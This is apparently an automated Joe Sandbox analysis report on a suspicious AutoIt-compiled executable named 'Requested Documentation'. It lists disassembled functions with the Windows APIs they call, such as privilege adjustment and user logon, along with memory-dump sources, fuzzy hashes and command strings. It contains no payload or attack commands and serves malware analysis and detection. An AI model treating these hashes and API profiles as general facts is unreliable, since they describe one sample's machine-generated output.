                                                                              • FindClose.KERNEL32(00000000), ref: 009EC72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
                                                                              • Instruction ID: 43066be4ffa395e5b69645e283ded7e5aabd21341d240b5e8fc91e325a1c3d9b
                                                                              • Opcode Fuzzy Hash: 8b30bf330ba49d74a353418aba63397e9afecefc051376cb0a50dd9091cb50d1
                                                                              • Instruction Fuzzy Hash: 931152716006059FDB10EF29D845A6AF7E9EF85324F04851DF9A597391DB30AC05CB81
                                                                              Function 009EA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA097
                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009F9468,?,00A0FB84,?), ref: 009EA0A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFormatLastMessage
                                                                              • String ID:
                                                                              • API String ID: 3479602957-0
                                                                              • Opcode ID: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
                                                                              • Instruction ID: c94e1f3ed8b809e446a0dc42e02899469f00e60cb4af35fa6b6fa20f3d288f49
                                                                              • Opcode Fuzzy Hash: a29653f2341ae2fd5e6e9a1bda2118e03e91f5fbcd1272f3534dc8f506eb1736
                                                                              • Instruction Fuzzy Hash: 7DF0823510522DABDB21AFA4DC48FEA776CBF09361F004165F919D6191D630AA41CBA1
                                                                              Function 009D81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009D8309), ref: 009D81E0
                                                                              • CloseHandle.KERNEL32(?,?,009D8309), ref: 009D81F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                              • String ID:
                                                                              • API String ID: 81990902-0
                                                                              • Opcode ID: 4577e5495ea8380fd3994ad79273261b8a5b9fa69e6a12c4d264a26522629565
                                                                              • Instruction ID: 426e8d39180cb512cca07414eeb1d0bf7c702929f4a2bd3302e4d4907f221fa1
                                                                              • Opcode Fuzzy Hash: 4577e5495ea8380fd3994ad79273261b8a5b9fa69e6a12c4d264a26522629565
                                                                              • Instruction Fuzzy Hash: E4E0E671014610AFEB656B60EC09E7777EDEF44310724882DF86584871DB615C92DB50
                                                                              Function 009AA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,009A8D57,?,?,?,00000001), ref: 009AA15A
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 009AA163
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
                                                                              • Instruction ID: 852d44631e73d4298108308c162102ad6177f869357cd873c91dcda56cc03cc3
                                                                              • Opcode Fuzzy Hash: 1a8e47b77360de39c71523e97049387ca328d6aa185945d1593736c43faa576b
                                                                              • Instruction Fuzzy Hash: EBB0923105820CAFCA106BD1EC09B883F68EB45BB2F404020F61D98860CB6254538A92
                                                                              Function 009AF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
                                                                              • Instruction ID: 0d8a13cd8e66671bc2b74dfb3c690fd10dc53bd2d289a52bb9278f2ec874d22b
                                                                              • Opcode Fuzzy Hash: a730e67b20c9e988eedb3bdb421b33a78cbacf338c21de24a0d831b6573f2238
                                                                              • Instruction Fuzzy Hash: DB320222D2DF014DD7239678D83237AA25DAFB73D4F15D737E81AB59A6EB28C4834140
                                                                              Function 009B242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
                                                                              • Instruction ID: 9707fd0b42a2f1164bed0fab5e7e314803fca3f2cbe8447899aceac616cbb394
                                                                              • Opcode Fuzzy Hash: 698c97193dc50df7bb436d5382a327ddf57ed5d5251bc8eecb87bede773d32a7
                                                                              • Instruction Fuzzy Hash: 66B10F20E2AF414DD32396798831336BB5CAFBB2E5F52D71BFC6A74D22EB2185834141
                                                                              Function 009E8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 009E889B
                                                                                • Part of subcall function 009A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009E8F6E,00000000,?,?,?,?,009E911F,00000000,?), ref: 009A5213
                                                                                • Part of subcall function 009A520A: __aulldiv.LIBCMT ref: 009A5233
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID:
                                                                              • API String ID: 2893107130-0
                                                                              • Opcode ID: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
                                                                              • Instruction ID: f3cc068b7a4006e38e4061949f1edc7d9841f5817b980fcf88169a9418f9bd28
                                                                              • Opcode Fuzzy Hash: ecda2e9ce205d7515f6c89274a0d8a37f5a8acf277039f067596ca0f01d5e1e1
                                                                              • Instruction Fuzzy Hash: 7121E4366355108BC729CF69D841B52B3E5EFA6310B288E6CD4F9CB2C0CA35BD05CB54
                                                                              Function 009E4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009E4C4A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
                                                                              • Instruction ID: 12a61f0f5ef3c0108a5c5590c5c3575448ed8696fd9753b0a49cb619d1132979
                                                                              • Opcode Fuzzy Hash: 3ac592659a443a5a1244ebddd4680945d1e04c25c40cfe9e11b9f3aa88a3e6b1
                                                                              • Instruction Fuzzy Hash: 97D05E9116528939EC2E07229E0FFFE030CE340782FF485897181CB0C2EC84AC415430
                                                                              Function 009D87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,009D8389), ref: 009D87D1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
                                                                              • Instruction ID: d0fb77535a9992a077eb880b69fa33b4d64eca6e3c0a6bdab008f95fba734f3a
                                                                              • Opcode Fuzzy Hash: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
                                                                              • Instruction Fuzzy Hash: A9D05E3226050EAFEF01CEA4DC01EAF3B69EB04B01F408111FE15D50A1C775D836AB60
                                                                              Function 009AA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 009AA12A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
                                                                              • Instruction ID: 1ab9c6ae98f72a329442e2f0cd775c7ebba47b5d486f32042c2139192b5e40ba
                                                                              • Opcode Fuzzy Hash: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
                                                                              • Instruction Fuzzy Hash: 3CA0123000410CABCA001B81EC044447F5CD6002A07004020F40C44421873254124581
                                                                              Function 00998808 Relevance: .6, Instructions: 590COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
                                                                              • Instruction ID: 361a4b0eefca7810a32342d0946e3545ec0dc05a1b49fd882ad495da0e68f2da
                                                                              • Opcode Fuzzy Hash: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
                                                                              • Instruction Fuzzy Hash: BE224430904506CBDF288A6CC49477EB7A9FB02344F39886FE9568B692DB34DD91CB51
                                                                              Function 009A21C5 Relevance: .3, Instructions: 345COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                              • Instruction ID: 553ade78f5d6837990e1c5993ffc4286a2cf5379b23bb6bf46b9eee2cb8958ce
                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                              • Instruction Fuzzy Hash: 29C195322091A30ADF2D473D843413EFAA55FA37B171A175ED8B3DB1D4EE14C925D6A0
                                                                              Function 009A25FA Relevance: .3, Instructions: 341COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                              • Instruction ID: 7b1f442076efa81ab3e93ecafc43eb7ee474a7c4234ad98668d3c290e91a96cc
                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                              • Instruction Fuzzy Hash: 78C193322051A30ADF6D473EC43403EBAA55FA37B131A076EE4B3DB1D4EE24D925D6A0
                                                                              Function 009A1978 Relevance: .3, Instructions: 323COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction ID: 24430b4fd1d0114f1198a8a6922598af750c6e0664a53a7e9af7e6be3a6634fb
                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction Fuzzy Hash: 8CC181322091A309DF2D463AC43413EBAA95FA37B171A176ED4B3DB1D4EE20C925D6A0
                                                                              Function 009F7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 009F785B
                                                                              • DeleteObject.GDI32(00000000), ref: 009F786D
                                                                              • DestroyWindow.USER32 ref: 009F787B
                                                                              • GetDesktopWindow.USER32 ref: 009F7895
                                                                              • GetWindowRect.USER32(00000000), ref: 009F789C
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009F79DD
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009F79ED
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A35
                                                                              • GetClientRect.USER32(00000000,?), ref: 009F7A41
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009F7A7B
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A9D
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AB0
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7ABB
                                                                              • GlobalLock.KERNEL32(00000000), ref: 009F7AC4
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AD3
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 009F7ADC
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AE3
                                                                              • GlobalFree.KERNEL32(00000000), ref: 009F7AEE
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B00
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A12CAC,00000000), ref: 009F7B16
                                                                              • GlobalFree.KERNEL32(00000000), ref: 009F7B26
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009F7B4C
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009F7B6B
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B8D
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7D7A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 3c1609bbdd280a069cbf97b588836562cb531db8e5b045ee34ba2a73c43941ef
                                                                              • Instruction ID: 16d7c763a30e7972686c4cab6ad3d87278f8d5a0328d4331993567d832f55d3e
                                                                              • Opcode Fuzzy Hash: 3c1609bbdd280a069cbf97b588836562cb531db8e5b045ee34ba2a73c43941ef
                                                                              • Instruction Fuzzy Hash: 51027B75900109EFDB14DFA4DC89EAEBBB9FF49310F048159F915AB2A1CB71AD02CB60
                                                                              Function 00A0356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,00A0F910), ref: 00A03627
                                                                              • IsWindowVisible.USER32(?), ref: 00A0364B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 4105515805-45149045
                                                                              • Opcode ID: 2023ab42c7d38723a873458d6b11b6030a29c7669afd18d4f2cafdd98c9d1728
                                                                              • Instruction ID: 83d60f808169f35ec016abacd1d9fa03d2793788e1e2c67cebe434c0b08dfc43
                                                                              • Opcode Fuzzy Hash: 2023ab42c7d38723a873458d6b11b6030a29c7669afd18d4f2cafdd98c9d1728
                                                                              • Instruction Fuzzy Hash: 0ED14D312043059FCF04EF10D856B6E7BA9AFD5394F188459F8865B3E2DB61EE4ACB81
                                                                              Function 00A0A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
